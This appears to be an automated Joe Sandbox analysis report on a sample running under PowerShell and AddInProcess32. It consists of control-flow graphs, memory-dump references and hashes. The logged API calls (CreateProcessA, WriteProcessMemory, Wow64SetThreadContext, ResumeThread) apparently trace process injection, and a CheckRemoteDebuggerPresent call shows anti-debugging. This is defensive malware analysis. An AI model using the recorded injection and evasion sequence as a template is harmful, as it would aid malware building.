                    control_flow_graph 864 4360040-43600d9 866 4360122-436014a 864->866 867 43600db-43600f2 864->867 871 4360190-43601e6 866->871 872 436014c-4360160 866->872 867->866 870 43600f4-43600f9 867->870 873 436011c-436011f 870->873 874 43600fb-4360105 870->874 880 436022c-436032b CreateProcessA 871->880 881 43601e8-43601fc 871->881 872->871 882 4360162-4360167 872->882 873->866 875 4360107 874->875 876 4360109-4360118 874->876 875->876 876->876 879 436011a 876->879 879->873 900 4360334-436041d 880->900 901 436032d-4360333 880->901 881->880 890 43601fe-4360203 881->890 883 436018a-436018d 882->883 884 4360169-4360173 882->884 883->871 885 4360177-4360186 884->885 886 4360175 884->886 885->885 889 4360188 885->889 886->885 889->883 892 4360226-4360229 890->892 893 4360205-436020f 890->893 892->880 894 4360213-4360222 893->894 895 4360211 893->895 894->894 897 4360224 894->897 895->894 897->892 912 436041f-4360423 900->912 913 436042d-4360431 900->913 901->900 912->913 914 4360425 912->914 915 4360433-4360437 913->915 916 4360441-4360445 913->916 914->913 915->916 917 4360439 915->917 918 4360447-436044b 916->918 919 4360455-4360459 916->919 917->916 918->919 920 436044d 918->920 921 436048f-436049a 919->921 922 436045b-4360484 919->922 920->919 925 436049b 921->925 922->921 925->925
                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0436030F
                    Memory Dump Source
                    • Source File: 00000006.00000002.482376211.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4360000_powershell.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: d51f29ea7cb92dcfafbc8d5e445b30bfa755c0be61254c3c4d722bf90b83a95c
                    • Instruction ID: 40c2dc7789b589aa958f0afe1d8522dda19def899d382424a57ab08083e2ebe1
                    • Opcode Fuzzy Hash: d51f29ea7cb92dcfafbc8d5e445b30bfa755c0be61254c3c4d722bf90b83a95c
                    • Instruction Fuzzy Hash: 8DC14770D0022D8FDF25CFA4C8417EEBBB1BF09304F10A5A9E859A7254DB74AA85CF81

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 927 4c47a8-4c47cd 928 4c49c0-4c49c8 927->928 929 4c47d3-4c47d8 927->929 939 4c49ca-4c4a0a 928->939 940 4c4977-4c497a 928->940 930 4c47da-4c47e0 929->930 931 4c47f0-4c47f4 929->931 933 4c47e4-4c47ee 930->933 934 4c47e2 930->934 935 4c47fa-4c47fc 931->935 936 4c4970-4c4974 931->936 933->931 934->931 937 4c480c 935->937 938 4c47fe-4c480a 935->938 936->940 941 4c480e-4c4810 937->941 938->941 942 4c4b8e-4c4b94 939->942 943 4c4a10-4c4a15 939->943 944 4c497c-4c4985 940->944 945 4c4988-4c498e 940->945 941->936 947 4c4816-4c4835 941->947 960 4c4b96-4c4bd2 942->960 961 4c4b43-4c4b4a 942->961 948 4c4a2d-4c4a31 943->948 949 4c4a17-4c4a1d 943->949 950 4c4994-4c49a0 945->950 951 4c4990-4c4992 945->951 982 4c4845 947->982 983 4c4837-4c4843 947->983 956 4c4a37-4c4a39 948->956 957 4c4b40 948->957 952 4c4a1f 949->952 953 4c4a21-4c4a2b 949->953 954 4c49a2-4c49bd 950->954 951->954 952->948 953->948 962 4c4a49 956->962 963 4c4a3b-4c4a47 956->963 957->961 965 4c4ce8-4c4cf0 960->965 966 4c4bd8-4c4bdd 960->966 967 4c4b4c-4c4b54 961->967 968 4c4b57-4c4b5d 961->968 970 4c4a4b-4c4a4d 962->970 963->970 990 4c4c9f-4c4ca4 965->990 991 4c4cf2-4c4d1d 965->991 975 4c4bdf-4c4be5 966->975 976 4c4bf5-4c4bf9 966->976 971 4c4b5f-4c4b61 968->971 972 4c4b63-4c4b6f 968->972 970->957 973 4c4a53-4c4a72 970->973 978 4c4b71-4c4b8b 971->978 972->978 1010 4c4a74-4c4a80 973->1010 1011 4c4a82 973->1011 984 4c4be9-4c4bf3 975->984 985 4c4be7 975->985 979 4c4bff-4c4c01 976->979 980 4c4c9a-4c4c9e 976->980 988 4c4c11 979->988 989 4c4c03-4c4c0f 979->989 980->990 992 4c4847-4c4849 982->992 983->992 984->976 985->976 995 4c4c13-4c4c15 988->995 989->995 998 4c4ca6-4c4cae 990->998 999 4c4cb1-4c4cb7 990->999 996 4c4d1f-4c4d41 991->996 997 4c4d4b-4c4d55 991->997 992->936 1000 4c484f-4c4856 992->1000 995->980 1002 4c4c1b-4c4c1d 995->1002 1038 4c4d95-4c4dbe 996->1038 1039 4c4d43-4c4d48 996->1039 1006 4c4d5f-4c4d65 997->1006 1007 4c4d57-4c4d5c 997->1007 1003 4c4cbd-4c4cc9 999->1003 1004 4c4cb9-4c4cbb 999->1004 1000->928 1005 4c485c-4c4861 1000->1005 1013 4c4c1f-4c4c25 1002->1013 1014 4c4c37-4c4c3e 1002->1014 1016 4c4ccb-4c4ce5 1003->1016 1004->1016 1017 4c4879-4c4888 1005->1017 1018 4c4863-4c4869 1005->1018 1008 4c4d6b-4c4d77 1006->1008 1009 4c4d67-4c4d69 1006->1009 1019 4c4d79-4c4d92 1008->1019 1009->1019 1020 4c4a84-4c4a86 1010->1020 1011->1020 1021 4c4c29-4c4c35 1013->1021 1022 4c4c27 1013->1022 1026 4c4c56-4c4c97 1014->1026 1027 4c4c40-4c4c46 1014->1027 1017->936 1036 4c488e-4c48ac 1017->1036 1023 4c486d-4c4877 1018->1023 1024 4c486b 1018->1024 1020->957 1032 4c4a8c-4c4ac3 1020->1032 1021->1014 1022->1014 1023->1017 1024->1017 1028 4c4c48 1027->1028 1029 4c4c4a-4c4c54 1027->1029 1028->1026 1029->1026 1055 4c4add-4c4ae4 1032->1055 1056 4c4ac5-4c4acb 1032->1056 1036->936 1054 4c48b2-4c48d7 1036->1054 1052 4c4ded-4c4e1c 1038->1052 1053 4c4dc0-4c4de6 1038->1053 1066 4c4e1e-4c4e3b 1052->1066 1067 4c4e55-4c4e5f 1052->1067 1053->1052 1054->936 1076 4c48dd-4c48e4 1054->1076 1060 4c4afc-4c4b3d 1055->1060 1061 4c4ae6-4c4aec 1055->1061 1057 4c4acd 1056->1057 1058 4c4acf-4c4adb 1056->1058 1057->1055 1058->1055 1064 4c4aee 1061->1064 1065 4c4af0-4c4afa 1061->1065 1064->1060 1065->1060 1080 4c4e3d-4c4e4f 1066->1080 1081 4c4ea5-4c4eaa 1066->1081 1072 4c4e68-4c4e6e 1067->1072 1073 4c4e61-4c4e65 1067->1073 1077 4c4e74-4c4e80 1072->1077 1078 4c4e70-4c4e72 1072->1078 1082 4c492a-4c495d 1076->1082 1083 4c48e6-4c4901 1076->1083 1079 4c4e82-4c4ea2 1077->1079 1078->1079 1080->1067 1081->1080 1096 4c4964-4c496d 1082->1096 1089 4c491b-4c491f 1083->1089 1090 4c4903-4c4909 1083->1090 1095 4c4926-4c4928 1089->1095 1093 4c490d-4c4919 1090->1093 1094 4c490b 1090->1094 1093->1089 1094->1089 1095->1096
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: _
                    • API String ID: 0-701932520
                    • Opcode ID: d1a37759a2972b8fb6724b0dd866fad8a548bb9dc7d9c60e91645f7410328233
                    • Instruction ID: a98e05ef101592d70b6d69977fc801bfe9045c2ff13225aff222ce1a32a8c730
                    • Opcode Fuzzy Hash: d1a37759a2972b8fb6724b0dd866fad8a548bb9dc7d9c60e91645f7410328233
                    • Instruction Fuzzy Hash: 2C126739B042508FDB558B749A20BBBBBA2AFD2310F1484BFD545DB351DA35CC42C7A6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1102 299c69-299cdb 1105 299cdd-299cef 1102->1105 1106 299cf2-299d59 WriteProcessMemory 1102->1106 1105->1106 1108 299d5b-299d61 1106->1108 1109 299d62-299db4 1106->1109 1108->1109
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00299D43
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: b4ce7a309fc2df0444bd3642d3c8385c4df8d31cbeab9db101eb66f1801d3c37
                    • Instruction ID: 4b45334b617a98e1c3d6685dfb44373134e6f51019bfbf458c9b63e1c70cddbf
                    • Opcode Fuzzy Hash: b4ce7a309fc2df0444bd3642d3c8385c4df8d31cbeab9db101eb66f1801d3c37
                    • Instruction Fuzzy Hash: B441AEB4D012589FDF00CFA9D984ADEBBF1BB49310F20942AE818BB250D375AA55CF64
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00299D43
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: b045769a61e87189849beb1ecde6031e222c47a093d86811b04f6e882365ee03
                    • Instruction ID: 7bfd0734d9c5bf675be0240431c0c830c8828084e4c335396ee5c2cd000e984e
                    • Opcode Fuzzy Hash: b045769a61e87189849beb1ecde6031e222c47a093d86811b04f6e882365ee03
                    • Instruction Fuzzy Hash: 9141ACB4D012589FDF00CFA9D984ADEFBF1BB49310F20902AE818BB250D335AA55CF64
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00299AC7
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 4bde30f89d2fc95e78e96d75a61b52102c7ed8dcf190195be7e61d2edfbade6f
                    • Instruction ID: 99820f739802965a16619dc5e670e9a1c0abac4c7bb1a1091f8fdc0c5b98c46a
                    • Opcode Fuzzy Hash: 4bde30f89d2fc95e78e96d75a61b52102c7ed8dcf190195be7e61d2edfbade6f
                    • Instruction Fuzzy Hash: A241BEB4D002589FDF10CFAAD484AEEBBB1FB49314F24842AE414B7250D7786985CF54
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00299AC7
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 8870cd600d1ce68faeac2647073c727bdd5ee3797ab1c17bef728f27533e558f
                    • Instruction ID: a5190b66bfe631c03e6343cc4f56c76905cfc6b45a836bd2fbbe6cef8a3c2cfe
                    • Opcode Fuzzy Hash: 8870cd600d1ce68faeac2647073c727bdd5ee3797ab1c17bef728f27533e558f
                    • Instruction Fuzzy Hash: 2B41ADB4D102589FDF10CFAAD884AEEBBB1FB49314F24842AE418B7250D7786995CF54
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 002999A6
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 32f16bd2717a6df5a2b55043ac005aa0e36b0b91fef0a5c756947cbc81f80d5e
                    • Instruction ID: d5344fdfd30ac403b63e40f42c4b7347895a4c46c35a1bdff5fd8d25cd86a31e
                    • Opcode Fuzzy Hash: 32f16bd2717a6df5a2b55043ac005aa0e36b0b91fef0a5c756947cbc81f80d5e
                    • Instruction Fuzzy Hash: 9C31CEB4D102189FDF10CFA9D884ADEFBB0AB49320F24952AE814B7350D775A945CF55
                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 002999A6
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 765f3f82dd11fe4abdec3ca6a563947169408314cc45ca864b3c6a582a2e69ff
                    • Instruction ID: 6694ca31ed0054b974eaf015df719b49fff2f7abe8cc83131555c8c877cb6694
                    • Opcode Fuzzy Hash: 765f3f82dd11fe4abdec3ca6a563947169408314cc45ca864b3c6a582a2e69ff
                    • Instruction Fuzzy Hash: 7731BBB4D102189FDF14CFAAD984ADEFBB4EB89310F24942AE818B7310D735A945CF95
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77cbef353d7d2c8bf2f1bee0831f5aa41d3bb27f6abae7e1adc6514c719ffae5
                    • Instruction ID: 6eee2f9f508ad92921356d39e452c208ffde113f8551b974daf14dae9df74022
                    • Opcode Fuzzy Hash: 77cbef353d7d2c8bf2f1bee0831f5aa41d3bb27f6abae7e1adc6514c719ffae5
                    • Instruction Fuzzy Hash: 7C41E278A042518FDB659B359620B7BBBB2AFC5310B1481AFD901AF351C339DD81CB66
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 476ff5172241bb8f877c3f60b849b333e6fab066c2c274574416a12ef9383488
                    • Instruction ID: 3ca6ca63ee4e77f61d9d37f35cf4ee984b1893fcb3d6b1abb0b1ecba9e60a388
                    • Opcode Fuzzy Hash: 476ff5172241bb8f877c3f60b849b333e6fab066c2c274574416a12ef9383488
                    • Instruction Fuzzy Hash: 4521AD78A00201DFDBA49E24C644B6EB7A1AB55310B14807FD4058B354E7F8DC82CB9A
                    Memory Dump Source
                    • Source File: 00000006.00000002.478246669.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1ad000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f4f3fc44f285e2494ffb322bbe4157ff16af5907c06b60916eabc5966b4f60eb
                    • Instruction ID: b272c0728e0a9b7bd09dc1585f9dbb8157f61931dd82946de7ea56e7ee0e8e56
                    • Opcode Fuzzy Hash: f4f3fc44f285e2494ffb322bbe4157ff16af5907c06b60916eabc5966b4f60eb
                    • Instruction Fuzzy Hash: 45018C6100D3C09FE7124B259D98762BFA8EF53620F1984DBE8858F5A3C2685C45CB72
                    Memory Dump Source
                    • Source File: 00000006.00000002.478246669.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_1ad000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 660be0d162cac86fa9276e3ab39cdb2534a05ecf75f1a1023b1fe8eefb156cdb
                    • Instruction ID: aebf09a806f249d6d1573b3c0abe5f45f5dadcc3b33492fe13cd8cecc3433516
                    • Opcode Fuzzy Hash: 660be0d162cac86fa9276e3ab39cdb2534a05ecf75f1a1023b1fe8eefb156cdb
                    • Instruction Fuzzy Hash: F801D4751047409AF7104A25D9C4767BF98EF52760F288125FC4A0A682C3799841C6B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: cresult
                    • API String ID: 0-2241522102
                    • Opcode ID: 3418e2425c20a1486709822f0a1916410e7efe49e268588c5979999f0129fe54
                    • Instruction ID: bd3dc2e05e72001f0935b48a79083f6d091e7005f657a93783a86120c6a93cd2
                    • Opcode Fuzzy Hash: 3418e2425c20a1486709822f0a1916410e7efe49e268588c5979999f0129fe54
                    • Instruction Fuzzy Hash: 9C412C6550E7D24FD7139B7888B94967FB0AF1B20530F09DBC4C0CF4A3DA28581AD762
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 844e34e53d065cdd6c9a95cfad97ebbfdf4fc03a4535a776bd0b49ed0e263630
                    • Instruction ID: 7c8a48d0525af36b850b1a56f3b863cb02f92ba57484573d2dd4326f84e8375c
                    • Opcode Fuzzy Hash: 844e34e53d065cdd6c9a95cfad97ebbfdf4fc03a4535a776bd0b49ed0e263630
                    • Instruction Fuzzy Hash: 9DC19D70A197D59FCB16CF68C8949897FB1FF06314B0A44DBD880DF1A3CA74A81ADB51
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca81a586762a68f1c141c9528e68cda7eeb8a095726c3fe93e79fd5ed6ab3793
                    • Instruction ID: 325842ef7b4de44ff168ac9101645b901c7ffc96193a2587b5489d42585a27fc
                    • Opcode Fuzzy Hash: ca81a586762a68f1c141c9528e68cda7eeb8a095726c3fe93e79fd5ed6ab3793
                    • Instruction Fuzzy Hash: D5817BA280E3C15FD7079B3888A91953F70AF2761671E04EBC0D0CF0B3E629591AD766
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 58342cc91efea8a0e00db18f5bad2854263bc427b03ef1931e93951e22ac7ea7
                    • Instruction ID: e2f5e1ab42b4cbab79d093629224b9ef777385fad1be7007e0d81faf73e9785b
                    • Opcode Fuzzy Hash: 58342cc91efea8a0e00db18f5bad2854263bc427b03ef1931e93951e22ac7ea7
                    • Instruction Fuzzy Hash: CE51EFA281F3C15FEB035B3988612D63FB0AE1762234A01E7D095CF0B3E548599EC72A
                    Memory Dump Source
                    • Source File: 00000006.00000002.478280272.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_290000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c741774ab759f33930b354fc9b405beeacd7f4a489b4b4aeb3d96858704c1ced
                    • Instruction ID: 088ad90b62c568087ea7b3f29ddbd9cde623d6f0d465839c4e750e23a5f1ae19
                    • Opcode Fuzzy Hash: c741774ab759f33930b354fc9b405beeacd7f4a489b4b4aeb3d96858704c1ced
                    • Instruction Fuzzy Hash: 3D5182A180F3D15FD7076B3A98612C63FB09E4362634B02E3D095CF0B3E55C588ACB6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.478378134.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$`81$`81$`81
                    • API String ID: 0-1692324471
                    • Opcode ID: 7b83413c7bbd021b484b1f0a5529f1f86bedddeeea79c6030683ad852e7e2a48
                    • Instruction ID: 6a14c58ec5c227b1498780d8b394b4edc09ce284a2b1a56971b646cd3e6c4874
                    • Opcode Fuzzy Hash: 7b83413c7bbd021b484b1f0a5529f1f86bedddeeea79c6030683ad852e7e2a48
                    • Instruction Fuzzy Hash: 48E12539B04244DFDB598B68D810BBFB7A2AF81310F18817BE9019B391CB79DD41C7A6

                    Execution Graph

                    Execution Coverage:10.7%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:100%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 12981 205318 12982 20535c CheckRemoteDebuggerPresent 12981->12982 12983 20539e 12982->12983

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1526 205318-20539c CheckRemoteDebuggerPresent 1528 2053a5-2053e0 1526->1528 1529 20539e-2053a4 1526->1529 1529->1528
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0020538F
                    Memory Dump Source
                    • Source File: 00000008.00000002.478316934.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_200000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: fb415ae67be0abd28e1edbf758b55ec8ea75f4b11eb25af5306c03654d1d2aa6
                    • Instruction ID: a49acfc3be5b4b14a88bde4d9426e7cb69500f82294608019d1e3a5b10b9b032
                    • Opcode Fuzzy Hash: fb415ae67be0abd28e1edbf758b55ec8ea75f4b11eb25af5306c03654d1d2aa6
                    • Instruction Fuzzy Hash: 6B2128B18002198FDB00CF9AD484BEEBBF4AF49350F14846AE855A7251D778A944DFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1404 5b1258-5b1274 1405 5b1276-5b1279 1404->1405 1406 5b127b-5b1297 1405->1406 1407 5b129c-5b129e 1405->1407 1406->1407 1408 5b12a0 1407->1408 1409 5b12a5-5b12a8 1407->1409 1408->1409 1409->1405 1411 5b12aa-5b13c5 1409->1411 1430 5b13d1-5b13e0 1411->1430 1431 5b13c7-5b13cb 1411->1431 1432 5b183e-5b1848 1430->1432 1433 5b13e6-5b13ef 1430->1433 1431->1430 1434 5b13f5-5b1400 1433->1434 1435 5b1834-5b1839 1433->1435 1436 5b180e-5b181a 1434->1436 1437 5b1406-5b141d 1434->1437 1435->1432 1436->1433 1438 5b1820 1436->1438 1437->1436 1441 5b1423-5b142c 1437->1441 1438->1432 1441->1435 1442 5b1432-5b1457 1441->1442 1445 5b145d-5b1474 1442->1445 1446 5b17fc-5b1808 1442->1446 1445->1446 1448 5b147a-5b1483 1445->1448 1446->1436 1446->1441 1448->1435 1449 5b1489-5b14a3 1448->1449 1451 5b14aa-5b14ac 1449->1451 1452 5b14ae-5b14be 1451->1452 1453 5b14f6-5b1509 1451->1453 1458 5b150e-5b1541 1452->1458 1459 5b14c0-5b14d0 1452->1459 1454 5b17d8-5b17dc 1453->1454 1456 5b17de 1454->1456 1457 5b17e7 1454->1457 1456->1457 1457->1446 1467 5b1583-5b1593 1458->1467 1468 5b1543-5b1581 1458->1468 1459->1458 1462 5b14d2-5b14e2 1459->1462 1462->1458 1466 5b14e4-5b14f4 1462->1466 1466->1453 1466->1458 1472 5b15ab-5b15c0 1467->1472 1473 5b1595-5b159b 1467->1473 1479 5b15c2-5b1629 1468->1479 1472->1479 1474 5b159f-5b15a1 1473->1474 1475 5b159d 1473->1475 1474->1472 1475->1472 1487 5b16db-5b16fb 1479->1487 1488 5b162f-5b1632 1479->1488 1497 5b16fd-5b173e 1487->1497 1498 5b1753-5b175f 1487->1498 1489 5b17b9-5b17be 1488->1489 1490 5b1638-5b1648 1488->1490 1499 5b17c3-5b17d6 1489->1499 1495 5b164e-5b16a3 1490->1495 1496 5b16d1-5b16d5 1490->1496 1495->1489 1522 5b16a9-5b16c3 1495->1522 1496->1487 1496->1488 1497->1489 1519 5b1740-5b1751 1497->1519 1504 5b1761-5b1767 1498->1504 1505 5b1777-5b178c 1498->1505 1499->1454 1506 5b176b-5b176d 1504->1506 1507 5b1769 1504->1507 1512 5b178e-5b17b7 1505->1512 1506->1505 1507->1505 1512->1499 1519->1512 1522->1489 1525 5b16c9-5b16cf 1522->1525 1525->1487
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: &55p
                    • API String ID: 0-1955183375
                    • Opcode ID: 3b815ed6413055c704a90ea06c5b6525fb53cb49edcb0df9a3d3e16114994291
                    • Instruction ID: 11956e3079f82b8864f2e5a0bdc461f543a46622063251bd06b291fd90562fcd
                    • Opcode Fuzzy Hash: 3b815ed6413055c704a90ea06c5b6525fb53cb49edcb0df9a3d3e16114994291
                    • Instruction Fuzzy Hash: AEF15F70B106048FDB54EFA5C494BAEBBB2FF85300F648569D4069B3A9CB71EC46CB94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1532 5b2248-5b2267 1533 5b2269-5b226c 1532->1533 1534 5b228f-5b2292 1533->1534 1535 5b226e-5b228a 1533->1535 1536 5b2298-5b22a4 1534->1536 1537 5b233f-5b2342 1534->1537 1535->1534 1541 5b22af-5b22b1 1536->1541 1538 5b2578-5b257a 1537->1538 1539 5b2348-5b2357 1537->1539 1542 5b257c 1538->1542 1543 5b2581-5b2584 1538->1543 1553 5b2359-5b2374 1539->1553 1554 5b2376-5b23ba 1539->1554 1544 5b22c9-5b22cd 1541->1544 1545 5b22b3-5b22b9 1541->1545 1542->1543 1543->1533 1547 5b258a-5b2593 1543->1547 1551 5b22db 1544->1551 1552 5b22cf-5b22d9 1544->1552 1549 5b22bb 1545->1549 1550 5b22bd-5b22bf 1545->1550 1549->1544 1550->1544 1555 5b22e0-5b22e2 1551->1555 1552->1555 1553->1554 1560 5b254c-5b2561 1554->1560 1561 5b23c0-5b23d1 1554->1561 1557 5b22f9-5b2332 1555->1557 1558 5b22e4-5b22e7 1555->1558 1557->1539 1574 5b2334-5b233e 1557->1574 1558->1547 1560->1538 1567 5b2537-5b2546 1561->1567 1568 5b23d7-5b23f4 1561->1568 1567->1560 1567->1561 1568->1567 1575 5b23fa-5b24f1 1568->1575 1598 5b24ff 1575->1598 1599 5b24f3-5b24fd 1575->1599 1600 5b2504-5b2506 1598->1600 1599->1600 1600->1567 1601 5b2508-5b250d 1600->1601 1602 5b251b 1601->1602 1603 5b250f-5b2519 1601->1603 1604 5b2520-5b2522 1602->1604 1603->1604 1604->1567 1605 5b2524-5b2530 1604->1605 1605->1567
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.478467223.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_5b0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: D'?
                    • API String ID: 0-3832636246
                    • Opcode ID: 4309f1f4bd2b4208a4c2755ec6ab3133006f44b5ba6777ad68e3e610715423db
                    • Instruction ID: 194fdb71a07f6f7bce6ab946be1e4af62ecc8f55b7f58465fdbc1aa78fa30c7e
                    • Opcode Fuzzy Hash: 4309f1f4bd2b4208a4c2755ec6ab3133006f44b5ba6777ad68e3e610715423db
                    • Instruction Fuzzy Hash: F3916F31B002058FDB24DF65D495AAEBBE6FF85310F208929E806DB394DB75FD4687A0

                    Control-flow Graph

                    • Executed
                    • Not Executed
